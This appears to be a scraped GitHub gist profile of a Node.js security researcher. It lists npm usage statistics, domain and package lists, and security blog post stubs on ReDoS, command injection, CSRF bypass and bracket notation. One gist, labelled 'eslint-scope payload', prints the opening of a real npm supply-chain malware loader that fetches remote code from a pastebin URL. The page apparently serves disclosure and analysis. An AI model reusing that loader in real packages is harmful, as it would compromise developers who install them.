Skip to content

Instantly share code, notes, and snippets.

View evilpacket's full-sized avatar
🤘
Hack the planet!

Adam Baldwin evilpacket

🤘
Hack the planet!
View GitHub Profile
4633514 - path
3569836 - fs
1646083 - util
1477850 - assert
896187 - events
820144 - buffer
766000 - child_process
642174 - http
534563 - url
424279 - crypto
5752dabccfc54c4ab82aea9626b7338e.monitor-eqatec.com
7af4ds.com2.z0.glb.qiniucdn.com
7rylsh.com1.z0.glb.clouddn.com
7xojg5.com1.z0.glb.clouddn.com
7xov2q.dl1.z0.glb.clouddn.com
acsc.cs.utexas.edu
admin.brightcove.com
airdownload.adobe.com
ajax.googleapis.com
akamai.bintray.com
"name","version"
"tarantul","0.8.86"
"tarantul","0.8.86"
"tarantul","0.8.84"
"tarantul","0.8.84"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"youstream","0.1.2"
"zookeeper-rp","3.4.5-2"
17monip
2wire
3000
3drotate
51degrees
64
7lab_groove_test
7zjs
@a-sync/opencv4nodejs
@achingbrain/node-syslog
ws: 18300469
fsevents: 17784701
gaze: 11832681
node-sass: 8865218
bson: 2686185
uws: 2360991
dtrace-provider: 1567984
pg: 1407674
grpc: 1137348
iltorb: 932043
@evilpacket
evilpacket / build.js
Created July 13, 2018 00:31
eslint-scope payload
try {
var https = require("https");
https
.get(
{
hostname: "pastebin.com",
path: "/raw/XLeVP82h",
headers: {
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
date Mon Nov 03 8:00:00 PDT 2014
slug regular-expression-dos-and-node.js
tags security, node.js, redos
title Regular Expression DoS and Node.js
author Adam Baldwin
type text

Imagine you are trying to buy a ticket to your favorite JavaScript conference, and instead of getting the ticket page, you instead get 500 Internal Server Error. For some reason the site is down. You can't do the thing that you want to do most and the conference is losing out on your purchase, all because the application is unavailable.

date 2014-08-19 17:04:34 GMT
slug Avoid-Command-Injection-Node.js
tags security, node.js, injection
title Avoiding Command Injection in Node.js
author Adam Baldwin
type text
date 2013-09-07 17:03:10 GMT
slug bypass-connect-csrf-protection-by-abusing
tags CSRF, connect, methodOverride, middleware
title Bypass Connect CSRF protection by abusing methodOverride Middleware
author Node Security Team
type text

Since our platform isn't setup for advisories that are not specific to a particular module version, but rather a use / configuration of a certain module, we will announce this issue here and get it into the database at a later date.

date Wed Jan 14 17:30:08 PST 2015
slug the-dangers-of-square-bracket-notation
tags security, node.js, javascript, hapi, RCE, square bracket notation, io.js
title The Dangers of Square Bracket Notation
author Jon Lamendola
type text

We are going to be looking at some peculiar and potentially dangerous implications of Javascript's square bracket notation in this post: where you shouldn't use this style of object access and why, as well how to use it safely when needed.